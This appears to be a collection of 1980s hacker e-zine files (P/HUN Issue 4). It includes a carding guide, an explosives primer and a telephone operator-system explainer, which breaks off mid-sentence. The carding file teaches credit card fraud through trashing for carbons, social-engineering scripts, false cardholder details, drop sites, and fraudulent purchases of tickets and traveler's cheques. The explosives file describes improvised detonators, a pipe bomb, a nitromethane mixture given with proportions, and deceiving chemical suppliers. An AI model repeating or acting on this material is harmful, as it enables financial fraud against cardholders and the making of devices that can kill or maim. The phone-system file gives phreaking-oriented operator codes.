---------------------------------------------------------------------------

FIRST- Let me clarify something. When you order something over the phone, and
the person selling you the items wants to know the actual Cardholder's name,
address, phone number, etc, you DO NOT have to give him/her the correct
information.

[UNLESS: You do have to give the person correct information if they have an
 online connection to a credit record bureau such as CBI or TRW. In this case,
 as they can verify everything that you say in a matter of moments, just do
 your best, get a new card, and never order from this company again. I will
 not lie to you: some companies do have this capability. But if you stick with
 little businesses who need your money, you'll do fine. ]

Bullshit your way through. Or hire a social engineer to do it for you. You do
not even have to give the correct expiration date! Almost any expiration date
will work as long as it is at least one month ahead of the current month and
it is not TOO far ahead in time so that it jumped over the actual expiration
date. (ie, if the current date is 10/89, give the expiration date 11/89 --
simple) The company from which you are buying things can not verify the extra
information YOU give them until after the order has been processed and the
package shipped. They have to get in touch with a Credit Union, which will be
discussed later on in this summary, to verify it all.

* ALL THAT THEY CAN VERIFY PRONTO IS THAT THE CREDIT CARD IS VALID, AND THAT
  IT HAS ENOUGH CREDIT TO PAY FOR THE MERCHANDISE YOU ARE PURCHASING. *

My suggestion, however, is that you give them the phone number of a pay phone
near your house. [ Or, if you want to REALLY make sure things go smoothly,
give them the number of a direct dial VMB local to the shipping address. ] If
they want to call you back, FINE. Ask them to do so between the hours of X pm
and Y pm. And, just pitch tent at the phone for a few hours a night. No
problem. They will almost always call right back, since they don't want to
inconvenience their customer who happens to be buying $6,000 worth of
computers at the time. Understand?

SECOND- Where should I have them ship it to, you ask? Fret not, my little
friend in carding. Before you call and order your things, first go out and
find an abandoned house. These still work best. Either one that has been moved
out of, and no one has moved into yet. Or, if you can, find one that is REALLY
abandoned. (BUT MAKE SURE IT HAS A STREET ADDRESS THAT THE POSTMAN OR UPS MAN
CAN FIND!) Jot down this address. This is referred to as a drop site.

[ Ed. Note: if, and I say IF you can rent a mailbox, do so. Make sure they
  sign for everything (UPS, etc) and bring some FAKE ID with you to open it
  up. Most of the time, they will give you hassle, and verify EVERYTHING you
  give them. So it is really not that easy to get one of these. At least try,
  though. ]

OKAY, give this address to the man or lady who is taking your order. Tell them
this is where you live. REMEMBER, they can not verify that you don't live
there for quite a while. They will send everything there. When the shipment
comes (either Overnight, Second Day, or whenever), pick it up (CASUALLY) and
stroll home to open your package. If it does not come, or if the salesperson
gives you trouble, don't worry. If it didn't come, it is because 1) It got
intercepted by the feds or 2) The company didn't process it because they did
actually try to verify your address, name, and phone number, thus delaying
your shipment, but saving themselves a lot of money. Just try another store
until you find some place that is easy to buy from.

THIRD- I suggest that you do not furnish your household with carded items. It
is just not wise. Get a few things, if you like, and wait a little while. Sit
tight. When things cool down, you might want to get some more things.
REMEMBER- all things are good in proportion, but when you get out of that
proportion (ie, get greedy and order a new house) you will most definitely get
caught sometime or another. Patience is the carder's best friend. (along, of
course, with the VISA formula... hehe)

FOURTH- You have all heard it before. DON'T DISPLAY YOUR SPECIAL TALENT AT
SCHOOL, PARTIES, OR SOCIAL EVENTS. Not even to your best friends. ESPECIALLY
not to your best friends. They are the ones most likely to brag about you and
spread the word. This is the farthest thing from what you want. Keep it to
yourself, and if you must tell someone about it, either call Phone Sex, a
Bridge, or an Alaskan Operator. Those are your only choices, as no other
carder or phreak wants to hear about how good you actually are.

FIFTH- I wouldn't advise making a business out of this, either. Sure, if you
want to get a few dollars for things you order (and that you don't want
anymore) sell it and keep the money.
But its purely asinine to take "orders" from people for money. And even if you don't want money. Keep in mind that Credit Fraud IS a felony, and getting caught violating US Federal Laws is not a fun experience to go through. Do you want to go to jail for 10 years, and never again be able to get a good job because Joey down the street wanted to pay $10 for a new skateboard that retails for $75?? Thats what I thought. Your whole goal in life, as long as you participate in the Underground Arts, is to keep a low profile. VIII. Getting Credit Cards There are a number of ways through which you can get credit cards. FIRST- Go trashing. That is, go in back of a bank, department store (make sure it is not in a mall!), or other store which accepts credit cards. When the coast is clear, jump in their trash bin. Rummage around a bit. Having a look out might prove to be wise. What you are looking for are carbons - the carbon paper which the salesperson throws out after a purchase has been made. Remember these? It is the device that guarentees you (a legit customer) get a receipt of your credit card purchase, and also that the store gets a copy for record keeping. Once you find these, (and making sure you don't rip them) put them in a bag, pocket, whatever, and get somewhere safe. (home?) Hold them up to the light, and copy down everything you think is important. Card Number, expiration date, name, address, bank name, etc... Then BURN the carbons. This destroys all evidence that you ever had them. From here, you are set. Order away! SECOND- If you have a friend that works in a store which performs credit card transactions, you might save yourself the trouble of banana peals on your head and ask him/her if they might not mind slipping the carbons into a bag after they ring up a sale. (or have them copy everything down for you.) THIRD- You might try bullshitting people and getting their cards. You have to be VERY good, and the person has to be VERY stupid for this to work. 
In my mind, it is a waste of time, and almost never works. (Because people where I live are smart, of course..) I am presenting this to you in case you live in a society of morons. Exploit every area that you possibly can. The conversation might go something like this: YOU: "Hello, Mrs. Davis? This is Mr. Off from Security down at Citibank. We have had a computer breakdown and no more of your VISA transactions can be processed since we lost your credit card number. Do you think that you can give me your number again, so I can re-enter it right now?" Mrs. Davis: "Wait a minute, who is this again?" YOU: "My name is Jack Off and I am from Citibank Security. (Explain whole situation to her again )" Mrs. Davis: "I don't know about this. Can I call you back at a number?" YOU: "Sure. That's no problem. I understand your reluctance. Here... call me at my office. Its 555-1212 (pay phone, loop, or bridge which you are at)" Mrs. Davis: "Ok, bye!" YOU: "Hello? This is Jack Off's office, Citibank Security, may I help you?" Mrs. Davis: "Oh, good. I was afraid you were a phony. Ok, my VISA is xxxx- xxx-xxx-xxx... " YOU: "Thank you. We will try to restore your credit limit as soon as possible. Until then, please refrain from trying to purchase merchandise on your Citibank Visa Card. Goodbye." Neat, huh? FOURTH- If are a really advanced Carder, you can get fancy and use a credit card formula. Great, you're saying to yourself. GIMME GIMME GIMME! Not so quick. Although several do exist, and I do have a couple of them, I am in a situation in which I am unable to reveal it. If you are particularly smart and intelligent, you can develope it yourself. Actually, it is not that hard if you have the means. MAYBE if you are good at math.... FIFTH- You may try to get credit cards from other people. (friends?) I stronly recommend against this. Usually the cards you get from other people have usually already been used and are either being watched or are already dead. 
SIXTH- If you have access to a Credit Union, you can call and "pull" someone else's account. (For instance, if you know someone's name and address, or social security, you can take a look at all of their loans and credit cards. ) IX. Advanced "Carding" Techniques Please, people, I beg of you -- If you have not been carding for a year or two (AT LEAST) do not read this information. It will only confuse you, and even if you understand it, it will not work as it should unless you have the experience you are lacking. So sit tight and practice with parts I-VIII. PLEASE! If, perchance, you happen to have the experience necessary to read on, then enjoy this. The following are simply a few details, hints, etc, that I just left out of the original manuscript due to my horrendous memory. Add to it if you like, and pass it a long. We all need to help each other if we are going to survive. Also, the following are in no particular order except that which they come to my head. 1) For a drop site, you can try to get fancy if need be. I have heard of empty military huts being used as well as empty condos, empty houses whose owners are on vacation, and about a zillion other stories. If you think you have come across something new, think a plan up, think it over, and think it over again. Make sure you have every step down so when you order, pick up, and make your escape, there are no problems. Think about it . . . what harm does it do to spend an hour making sure you didn't overlook something. It is a lot better than going there and getting caught. 2) Sometimes the places you order from will have an online account with a credit record bereau. (Such as TRW, CBI or Transunion) The horrifying fact is that they can verify ONLINE ANY information that you give them. So, you're busted, right? Wrong . . . If this happens, there is nothing you can do unless you have a lot of power with phones. Chances are, you don't. So play it cool and give an excuse to get off the phone. 
Just try somewhere else. Also, if you don't do this right, you will probably kill the credit card. X. Credit Unions Credit Unions basically are databases that hold information of its members. When you apply for a credit card, I think that the application to be a member of a Credit Union is presented also. Since almost EVERY person who owns a credit card has personal information in at least one of these services, then there is no fooling he who has access to these services. Many times in your carding career, you will run into a bussiness who has an online connection to such unions. If you try to present false information they will catch you and follow up with the appropriate actions. (That is, report the credit card you said is yours as dead, call the authorities, etc, etc.) Two of the major Credit Bureaus in the United States are TRW and CBI. As these two services hold large bases of information on its members (ie, every credit card holder in America), many unauthorized personnel often wish to gain access to them. They are accessed through a computer by calling a Bureau port and entering authorization passwords. For CBI, the passwords are in the format of nnnllnnn-**, where n=a number 0-9; where l=a letter from a-z; and where *=any character. For TRW, the passwords are in the form of lllnnnnnnnlnl. (using the same key as CBI.) As you can see from the length and complexity of these passwords, it is literally impossible to hack them. (ie, hack in the sense guess them.) So you are probably wondering how unauthorized persons gain access, huh? Well, we either have inside information or we go trashing. Thats it. Right now, however, I am not going to go any further into the subject of credit unions. Be aware that they exist, and they can help you as well as hurt you if you don't know what you are doing. At a later date I plan on devoting an entire file to the subject of credit unions, as I haven't seen an up-to-date file in years. Thats about all. 
I wish you all good luck, and may your adventures be safe and fun-filled. And if I EVER catch any of you giving out the credit formula (once you discover it..) I am going to personally fly over and kick your ass. (remember- I have carded tickets around the country many times. There is nothing to stop me from visiting YOUR town.. hahaha) One final note -- VISA is planning on changing their credit formula within a few years. So if you happen to be reading this many a year down the line, you will most likely discover that some of this is no longer valid. DONT BLAME ME. It was valid at the time when I compiled it. APPENDIX A ---------- Credit Card Formats ------------------- American Express -- xxxx xxxxxx xxxxx X/ X/ X/ / | X / | X 4 digits 6 digits 5 digits VISA -- xxxx xxxx xxxx xxxx X_________________/ 4 digits each group OR -- xxxx xxx xxx xxx X/ X_________/ / 3 digits each 4 digits Mastercard -- xxxx xxxx xxxx xxxx X_________________/ 4 digits each group Discover -- xxxx xxxx xxxx xxxx X_________________/ 4 digits each group. APPENDIX B ---------- Credit Verifiers 1800-554-2265. Use '#' (pound) as control key. Card Type: 10 = Mastercard 20 = Visa Bank Identification: 1067 Merchant Number(s): 1411 52 IDEA:: You all know those sex lines (like 800-666-LUST), well they verify your credit card before they let you listen. You might try calling one of these and using it for a while if you have nothing else. APPENDIX C ---------- Other Things to Do 1] Plane Tickets It is relatively easy to order plane tickets using a credit card nowadays. And, for convenience, you can order over the phone. Well, look up your favorite airline, call them, and present them with the situation. You would like 2 executive class tickets to Florida [ Ed. Note - If you live in Florida, make it a trip to California ] round trip to be billed to your Visa Credit Card. Oh sure, maam. My credit card number is . My expiration date is . My Name is Joe Schmoe. I live at 223 Hard On Lane, Pubic Hair, PA. 
Oh, and maam, could you PLEEAZE hold the tickets at the airport for me. I will present some identification to pick them up there. Thank you. It is relatively easy to do this. But, there are a few catches. A.) Do NOT stay for any long period of time at any one place. After few days, the airline will catch on to what you have done. My suggestion is that you stay for only about 2 to 3 days. Or, if you really want to stay for a long time, get a one way ticket to wherever it is that you would like to go to. Stay however long you want to stay and take another 1 way ticket home. B.) If you plan on traveling around the country, catch one way tickets around from place to place. And please, USE DIFFERENT AIRLINES! 2] Motorcycles Again, you would be surprised at the amount of work (or lack of it) required to aquire motorcycles on other people's credit cards. I believe you can all see the advantages, so let us get down to the procedure. First, set up an order under a corporate account. You can find these sometimes if you work in a store that would use such cards. (Look over shoulders) Well, I will leave to you the methods to come upon corporate account cards. Once you have them, finish the procedure. Step 2 is to send an "employee" (yourself or a stupid friend) to pick it up. Bring proper identification that was issued from the corporation. (I suggest making your own -- Not very hard). Offer a Voice Mail Box as your bussiness number. It is very common for a high level employee to be absent from his desk. Use your imagination for the rest, and tidy it up to perfect it. 3] Travelers Cheques OKAY, I will admit this is getting out of hand, but what the hell -- For those of you very daring and in possession of a very good form of false identification (Birth Certificate?), you can easily order some American Express Traveler's Cheques for your travels around the world. The number to call is 1-800-777-7337. 
Using your American Express Credit Card, order some of these "babies" in another name. (For a gift..) Have them delivered as you deem appropriate. Enjoy them thouroughly. [ Ed. Note: This number is active as of 12-20-88. I don't know if these offer this service year round. Find out! ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= P/HUN Issue #4, Volume 2: Phile 5 of 11 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD Introduction to Home Explosive Manufacture Written by: Franz Liszt I do not assume any responsibility in how this information is used; legally or illegally and I do not recommend that one manufacture explosives without a B.A.T.F. licence. Do not worry about possessing this information because the F.O.I.A. allows you to have any information such as this, so as long as it is not classified data. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- INTRODUCTION I know of all of you phreaks, hackers, etc. out there are interested in any kind of information that the public usually does not publicize. This is why I have wrote this phile - to inform you. I also feel that I should volunteer this information to PHUN because I have obtained much useful information from that publication and others. I think that anyone with good knowledge should teach it to their phriends because we are becoming a dumb race due to the enlightened attitude of the population from influences such as yuppies, geeks, skateboard freaks, subliminal brainwashing, bloated bureaucrats, and lazy legislatures. We must try to become free THINKING people so our brains do not atrophy. Don't let any of the above influences brainwash you into a quivering pathetic mass of gelatin like so many people are now. Use any information from philes you read to benefit you and rid of the bastards out to get you!!! At any rate, lets get on with it...The field of explosives is a very interesting one to study. It can be fun, and it can be dangerous at the same time. 
One must exercise great caution when assembling any type of explosive device since most are sensitive to jarring, rough handling, friction, static, and other influences. THIS INCLUDES MIXING ANY CHEMICALS OR EXPLOSIVES TOGETHER. DO NOT EVER MIX ANY EXPLOSIVE FORMULA TOGETHER WITH ANOTHER UNLESS YOU WANT YOUR BODY EVAPORATED OR AT THE LEAST, LIMBS REMOVED OR EYES BLINDED. If you are uncertain of an explosive formula you have found in an anarchist book or on some BBS, don't make it. As a matter of fact, don't trust to many philes you see and only believe the reputable books such as "The Poor Man's James Bond I & II", the "CIA Black Books", and army field manuals. I also ran across some new books called "Kitchen Improvised Explosives", which can be had from a radical book company called LOOMPANICS UNLIMITED P.O. Box 1197, Port Townsend, WA 98368. They are also a very good source for information but the procedures outlined require more lab apparatus. It is also a good idea to take some chemistry classes. Take advantage of chemistry in high school if you are still there. You can learn a lot if you pay attention and read ahead of your teacher. Try to get on his good side so he will let you perform "extracurricular activities" in the school lab. You can learn a lot by doing experiments and you can also have access to chemicals and expensive lab ware which I find is necessary to safely make many explosive compounds. If you are out of school, and you want to get serious about explosives, take a chemistry class or two at your local college. Call your local Technical school if you have one and ask them if they are offering any miners blasting seminars in the future (yes these do exist). If not, call your local bureau of mines and inquire. Some "social engineering" may be necessary when talking to them though. One should at least go to the local library and look for explosive books and check the encyclopedias for "scratch the surface" information. 
If you know a little about chemistry, get the book "The Chemistry of Powder and Explosives" by Tenny L. Davis. You can obtain journal footnotes from such books and do further research in "Chemical Abstracts" and "The Journal of the American Chemical Society" along with many others; all obtainable from a halfway decent college library in the reference section. __________________________________________ EXPLOSIVE TYPES Basically, there are two types - low and high. The low explosives are chemical compounds such as black powder, flash powder, match head powder, etc. These compounds do not necessarily explode but have more of a burning characteristic. They will propagate into an explosion when confined in a solid container such as a "pipe-bomb" so the gases they produce can expand forcefully instead of burning away in the open air. Black powder for instance detonates at about 300 meters per second, which roughly means if you make a "train" or line of it 300 meters long, and detonate it with a blasting cap at one end of the train, the chain reaction and decomposition of the whole train will take one second. And black powder releases about 12000 PSI when confined in nominal 2" water pipe with a wall thickness of 1/8" and detonated with a No. 8 blasting cap (this is a standard size blasting cap that coal miners and the military uses). Notice I said that it must be detonated. You cannot just stick a wick in the pipe and light it because more that likely it will only burn and make a big fire. I will talk more about detonation later. 2,4,6-Trinitrotoluene (TNT) detonates at about 7400 meters per second when cast loaded into a container. TNT is a high explosive and its subsequential confinement in a container is not as important as with low explosives. High explosives are chemical compounds that will explode regardless of containment. You could lay a big pile of TNT on the ground, lay a blasting cap on top of it, light the wick, and the whole mess will still explode. 
High explosives undergo a chemical reaction of decomposition in less that a millionth of a second. All of the energy is released instantaneously. Low explosives, such as black powder have more of a burning characteristic. High explosives not only detonate much quicker, but also release more energy. TNT releases about 4.24 million PSI and the military explosive C-4 releases about 5.7 million PSI and detonates at 8100 meters per second! _____________________________________________ DETONATION Most high explosives are not capable of detonating without being set off or initiated with another explosion. This is done with the help of those neat little goodies called blasting caps. They contain medium to high explosives also, but their chemical composition(s) are unstable and will detonate when fire or spark is introduced to them. You may ask then why not just use blasting cap explosive instead of regular high explosives. Well, blasting cap materials are VERY sensitive to shock, friction, etc. and are also not as efficient as regular high explosives. Anyway, the blasting cap is usually placed in the high explosive in a well dug in the high explosive. An example would be like this in a pipe bomb: _______ Blasting cap / !-- * --! ! * ! ! * ! ! !_____ Pipe bomb ! ! ! ! ! ! ! ! !-------! (please excuse the ASCII drawing) When the cap is detonated, the explosive wave it generates is directed downward and detonates the high explosive in a "chain reaction". This is why the bottom of the explosive container should be placed on the target. The peak of the propagated explosive wave will be at the bottom of the explosive charge... At any rate, I do not suggest that one attempts to manufacture blasting caps without knowledge in explosive handling safety and also the proper laboratory procedures when making the blasting cap explosive itself. I have made over 300 blasting caps without an accident. 
I also take very careful precautions before assembling the caps and I have a properly equipped laboratory to synthesize the explosive material. I always work in a controlled environment with accurate measuring equipment for any explosive experiment I partake in. It is necessary to work under a lab fume hood to vent any toxic gases produced during experiments. It is also a good idea to ground yourself and your work area so static electricity doesn't wreak havoc and blow your chemical up in your face. IT IS GOSPEL TO FOLLOW DIRECTIONS WHEN DOING ANY EXPERIMENT. ESPECIALLY WITH EXPLOSIVES. Outline your explosive production procedure before proceeding with any experiment. Refer to literature at your local library concerning blasting cap mfg. before you attempt to make them. The book I mentioned "The Chemistry of Powder and Explosives" covers the subject very well. There are also some good books available from Paladin Press on explosive manufacture and the blasting cap manufacture. It is possible to create blasting caps in a "kitchen" type environment, but I do not recommend it because of the dangers involved when making the explosive components. Many of the starting materials are corrosive and toxic. Blasting cap explosives are also VERY sensitive. More so than nitroglycerine in some cases. For instance, Lead azide, the most popular blasting cap explosive today, when synthesized improperly, can grow into crystals in the starting agent solution and spontaneously explode just because of improper stirring and/or cooling. Very easy mistake to do. Mercury fulminate, one of the cheapest and easiest to synthesize, produces toxic gases when synthesizing. When the finished product is dry, it is sensitive to a 2cm drop of a 5 lb. weight. THAT IS SENSITIVE! ALTERNATIVE: After all of this negative talk of blasting caps leaves much to be desired. 
But there is an alternative to using blasting caps if one has access to firecrackers such as M-80's, M-100's, M-200's, cherry bombs, Maroons, etc. These little bombs themselves are sufficient enough to detonate many high explosives. All of the "nitro" compounds will detonate with one of these firecrackers. Their use would be the same as the blasting cap - inserted in a little "well" made in the explosive charge, sealing off, and their fuse ignited accordingly. ____________________________________________ MAIN EXPLOSIVE CHARGE This is the big working explosive. The one that does the big damage. It should be handled with the same precautions as blasting caps, but in many cases, can be as safe as handling fertilizer. Some examples of common high explosives are ditching dynamite, gelatin dynamite, ANFO (ammonium nitrate fertilizer/fuel oil), TNT, PETN, RDX, military plastics, and even smokeless powder. These explosives are easily made in some cases, and dangerous at the same time. Since it is beyond the scope of this article, I must refer everybody to your local library, the books I have mentioned, or most of the "unusual" book publishers. Just do research in all possible material before grabbing a book and running out, buying the chemicals, and throwing stuff together. Get yourself a few of the "black-books", the "Poor Man's James Bond volumes", etc. and compare them with each other. Don't trust any unheard of publishers or books. It goes the same for the main charge; if one doesn't have access to the necessary chemicals, one can improvise. For instance the smokeless powders available from gunsmith's and reloading shops contain high- explosives such as nitrocellulose and nitroglycerine. They are called double based propellants. An example is made by Hercules Powder co. called "Bullseye" pistol propellant. It contains: 48% Nitroglycerine 50% Nitrocellulose 2% Flash suppressants, stabilizers, etc. It will detonate at about 7200 meters/sec. 
when firmly packed in 2 inch wide, schedule 40 hardened steel pipe. It detonates with 2,000,000 PSI also. This should suffice for many operations. I myself placed 1 1/2 pounds of the powder in a three pound coffee can and detonated it with an M-80 firecracker and it left a ditch in hard packed clay-soil about 2 feet deep and 3 feet wide! It was simply placed on the ground with the bottom of the can down. The blast was plainly heard indoors 1 mile away! Please if you attempt such a blast, make sure you give yourself ample time to get at least 300 yards away and don't detonate it near any buildings within 50-75 yards because the air-blast will possibly crack their windows. I usually use a lit cigarette placed on the fuse of the cap or firecracker. This will give you about 10 min. delay depending on the temperature and wind conditions. Packing the cigarette will give a longer delay. Another good explosive, if you prefer a liquid explosive is a mixture of Nitromethane and amine based compounds such as aniline, ethylenediamine, and for anyone that can't obtain the above chemicals, regular household ammonia will work as long as it is the clear non-detergent brand. The Nitromethane can be had from any "speed-shop" or race car parts supplier. It usually runs about $20 to $30 bucks a gallon. Simply mix the two liquids: 96% nitromethane and 4% ammonia (by weight). This explosive has the disadvantage of being somewhat insensitive. You need at least a No. 8 blasting cap to detonate it. It only need be confined in any kind of capped bottle and the blasting cap inserted in the neck. The blasting cap should be dipped in wax before immersion in the liquid explosive. Some Nitromethane manufactures add a indicator dye that turns purple when the liquid becomes dangerously explosive. So, when you mix your ammonia with the Nitromethane and the solution turns purple, you know that you have done well! 
________________________________________ OBTAINING CHEMICALS AND LAB WARE Getting your chemicals and lab ware can present a problem in some cases. In order to order laboratory chemicals, one must be a company, or try to prove that you are a company. Most suppliers don't like to sell to individuals in fear of clandestine drug and explosive manufacture. Those same companies also can be fooled easily with homemade letterhead also. For those of you with laser printers, the sky is the limit. If you don't have a laser printer, you should visit your local print shop. First, simply call the chemical companies and request for a catalog. You must get on the phone and say something on the order of: "Hello...this is C.B.G. Water Treatment Corp., may I speak to sales please? I would like to order your most recent catalog..." When you get catalogs from different companies, compare their prices and shipping charges. Make sure you don't order a set of chemicals where it is obvious you are making something you don't want them to know you are making. A suspicious order would be Nitric & Sulfuric acid and glycerine. This would be obvious that you are going to produce nitro- glycerine. Spread out your orders and orders between companies. Also be careful of watched chemicals. The drug enforcement agency watches certain orders for certain chemicals. They usually say something on the order of under the listing of the chemical entry in the catalog "only sold to established institutions." It just so happens that certain explosive synthesis requires the chemicals as some illicit drug production. Go to your local library in the reference section. Get the THOMAS REGISTER It is a set of books that list addresses of industrial suppliers. Look under chemicals for addresses. I do know of one company called Emerald City Chemical in Washington. They only require that you be at least 18 years of age. No letterhead necessary. 
I suggest staying away from Fisher Scientific, Seargent Welch, Sigma & Aldrich Chemical companies because they are either expensive, only sell to schools, or watch for illegal or suspicious chemical orders. I noticed that a lot of you phreaks out there live in New York; so stay away from City Chemical Co. I was informed that they closely watch their customers also. Don't make some letterhead for Jo Blow's Sewing Machine Repair and order complicated chemicals like 2,3,7,8-tetrachlorodibenzo-p-dioxin, bis-2- ethylhexy-diadipate, 3,4-diaminofurazain, or pharmecitucal type chemicals or any kind of chemical that looks like a foreign language. It looks VERY suspicious and your address will be forwarded to your local FBI or DEA office pronto. Nowadays you really got to watch what you order thanks to our bleeding heart liberals worrying about kids blowing their hands off trying to make firecrackers, or folks making controlled drugs in their basements. ________________________________________ CONCLUSION I hope this information is of some use to you. Just remember that it is a federal offense to manufacture and transport explosives or explosive devices without a B.A.T.F. licence. Also keep in mind that if you do decide to make yourself some bombs, just remember NOT TO TELL ANYONE! If you tell someone, that is just the added risk of getting caught because your "buddie" was a stool pigeon. BELIEVE ME - chances are if you tell someone, others will find out from gossip and you will be the alias "mad bomber" of your town. If someone happens to see any lab equipment or if your neighbors smell any strange chemical smells around your home, they might even think you are making drugs, so be careful. If you tell your friends of your activities, don't be surprised if you see a gunmetal grey Dodge Diplomat with a dozen antennas protruding from it sitting across the street with a guy in it watching your house with a spotting scope... DO NOT SELL explosives to ANYONE without a licence. 
If they get caught, the feds will plea-bargain with them and find out where they got the bombs and of course your buddy will tell them so he gets a reduced sentence. They WILL get a search warrant with no problem and proceed to ransack your premises. I know of a person that was in a similar situation. He didn't have any explosives in his house, but they seized his chemicals because of the complaint filed. Subsequently, the feds kept up pretty good surveillance on him for quite a while.

Use this information with caution and don't blow yourself up!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Feb. 20, 1989
Brought to you by Franz Liszt, and The Manipulators...

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

NOTICE: THIS FILE MAY ALSO BE RELEASED IN A 'YET TO COME' NEWSLETTER.

*************************************************************************

            P/HUN Issue #4, Volume 2: Phile 6 of 11
            ---------------------------------------

          Traffic Service Position System (TSPS) No. 1B

               Call Processing and Explanation
                          Part One

*********************************************************************

               - Coin Stations and ACTS
               - Calling Card Service
                        and
               - Billed Number Screening
               - Busy Line Verification

*********************************************************************

                       Written By. . .
                       Phelix the Hack

*********************************************************************

The author hereby grants permission to reproduce, redistribute or include this file in your g-file section, electronic or print newsletter, or any other form of transmission of your choice, pending the fact that it is kept intact and in its entirety, with no additions, alterations or deletions of any of the info included below.

                                        Phelix the Hack   Feb. 1989

*************************************************************************

1.0 Introduction
================

The purpose of this file is to discuss and describe the general system architecture and processing of certain calls handled in a Traffic Service Position System (TSPS) No. 1B office. Hereafter, any reference to the acronym TSPS will be used to describe the Traffic Service Position System 1B. Whereas TSPS processes a wide variety of call types (listed below), this file will deal primarily with only a few types which I feel to be of special interest and importance to the phreak/hack community. Future files on TSPS will continue to expand upon the information presented here, and will discuss additional call types and processing.

The types of calls chosen for discussion in this file fall primarily within the following three categories:

1) Coin Station Calls (Payphone) and ACTS call processing.
2) Calling Card Service and Billed Number Screening.
3) Busy Line Verification

2.0 Table of Contents
======================

Section   Description
=======   ===========
   3      Acronyms and Abbreviations used throughout this file.
   4      General overview of call types.
   5      General call processing for Coin and CC Services.
   6      Coin Station.
   7      Calling Card Service.
8 Busy Line Verification 9 Conclusion : Acknowledgements and References. 3.0 Anacronyms and Abbreviations ================================= The following is a list of anacronyms and abbreviations commonly used throughout this file. Due to the large number of times each appears, from this point on the abbreviations will be used the majority of the time. - TSPS - Traffic Service Position System - ANI - Automatic Number Identification - ANIF - ANI Failure - ONI - Operator Number Identification - H/M - Hotel/Motel - DLS - Dial Line Service - ACTS - Automated Coin Toll Service - CCS - Calling Card Service - BNS - Billed Number Screening - OST - Originating Station Treatment - SOST - Special Operator Service Treatment - OPCR - Operator Actions Program - RQS - Rate Quote System - PTS - Position and Trunk Scanner - RTA - Remote Trunk Arrangement - DDD - Direct Distance Dialed - AMA - Automatic Message Accounting - CAMA - Centralized Message Accounting - RBOC - Regional Bell Operating Company - MF - Multi-Frequency - DTMF - Dual Tone Multi-Frequency - CDA - Coin Detection and Announcement - SSAS - Station Signaling and Announcement Subsystem - SPC - Stored Program Control - T&C - Time and Charge - PIN - Personal Identification Number - RAO - Revenue Accounting Office - NPA - Numbering Plan Area - CCIS - Common Channel Interoffice Signaling - APF - All PINs Fail - OTC - Operating Telephone Company - ICVT - InComing Verification Trunk - OGVT - OutGoing Verification Trunk - INTT - Incoming No Test Trunks 4.0 General Overview of Call Types ================================== All call processing can be broadly thought of as the processing of a service request (by an operator or a customer) thru connection, talking state, and disconnection. Call types can be classified into the following two major groups: (Although no definite line can be drawn, in that the groups often overlap each other.) 

4.1 Customer Originated Calls
=============================

The first category of calls are those which can be classified as customer
originated. In an effort to keep with the three main types discussed here,
some of the call types listed will not be explained.

4.1.1) 1+ Calls
===============

  - DDD calls
  - Calls with ANIF or ONI
  - H/M calls
  - CAMA calls
  - 900 Dial Line Service (DLS)..."Dial a Vote"
  - NonCoin transfers from offices without billing equipment
  - Coin Calls...Discussed later in greater detail

4.1.2) 0+ Calls
===============

  - Calling Card Service (CCS) Calls
  - Billed Number Screening (BNS) Calls
  - Originating Station Treatment (OST)..Third Party Billing, Collect..

4.1.3) 0- Calls
===============

  - OPCR ...Standard RBOC (or Equivalent) "0" operator

4.1.4) International Call Handling (ICH) ...Overseas Calls
==========================================================

4.1.5) Automated Quotation Service and H/M calls
================================================

4.2 Operator Originated
=======================

The second category of calls handled by TSPS are operator originated, and
are normally only initiated after a response to a customer's request. These
calls are of a nature that require operator intervention in order to
complete. Examples: BLV/EMG INT, collect, third party billing...

4.2.1) Special Operator Service Traffic (SOST)
==============================================

  - These include calls which must be transferred to a SOST switchboard
    before they can be processed. Examples: Conferences, Appointment,
    Mobile...

4.2.2) Delayed Calls
====================

4.2.3) Operator Service Calls
=============================

  - Customer/Operator requested Rate and Route information (RQS)

4.2.4) CAMA Transfer Calls
==========================

  - Includes ANIF and ONI
  - Transfers from areas without billing equipment

4.2.5) Busy Line Verification (BLV)
===================================

  - The Busy Line Verification allows a TSPS operator to process a
    customer's request for a confirmation of a repeatedly busy line. This
    service is used in conjunction with Emergency Interrupts and will be
    discussed later in more detail.

4.2.6) Inward Calls
===================

  - An inward call requires a TSPS operator to provide services which the
    customer's originating operator is not able to provide. Ex: connection
    to a hard to reach number, BLV/EMG INT, CCS billing validation...An
    inward call can be originated with any of the following arrival codes:

      - 121  : NonCoin code...standard inward connection
      - 1150 : Coin code
      - 1155 : Noncoin with T&C code
      - 1160 : TSPS operator assisted inward CCS validation
      - 1161 : Automated inward CCS validation for non TSPS operator with
               DTMF touch tone signaling.
      - 1162 : Automated inward CCS validation for non TSPS operator with
               MF signaling.

  - Examples of the above codes:

      - KP+NPA+121+ST gets inward operator in NPA selected with only INWD
        key illuminated, indicating call connected to position in an inward
        call.
      - KP+1161+ST gets automated CCS validation that responds to DTMF
        tones.

5.0 General Call Processing for Coin Stations and CCS
=====================================================

This section will deal with the processing that occurs during all customer
initiated calls, and can be applied to both Coin and CCS calls. The
following processes are presented in the order which they would normally be
handled.

5.1) Trunk Seizure
==================

  - When a local office seizes a trunk in response to a customer request
    (i.e.- A customer has picked up the phone, placing it off-hook), current
    flows thru the circuit, changing the state of the ferrods (i.e.- scan
    points) from an on-hook to an off-hook position. When this change is
    determined by the PTS (Position and Trunk Scanner) at the RTA (Remote
    Trunk Arrangement) to be an actual off-hook transition, and not merely a
    flash (tapped switch hook), it is taken as a request for service.

5.2) Digit Reception
====================

  - After a trunk is seized the local office sends the called and calling
    number to the TSPS by means of MF pulsing. A Base Remote Trunk is
    connected to the MF receiver, which then proceeds to outpulse the MF
    digits. The digits are received and registered on ferrods by the PTA in
    the order in which they were received. The called number is the number
    dialed by the customer and consists of either 7 or 10 digits; the
    calling number is determined by the local office ANI equipment or by
    ONI, in case of ANIF.

5.3) Bridging a Position
========================

  - An idle occupied position is then bridged onto the call by a connection
    to the TSPS. If operator service is required after connection to a
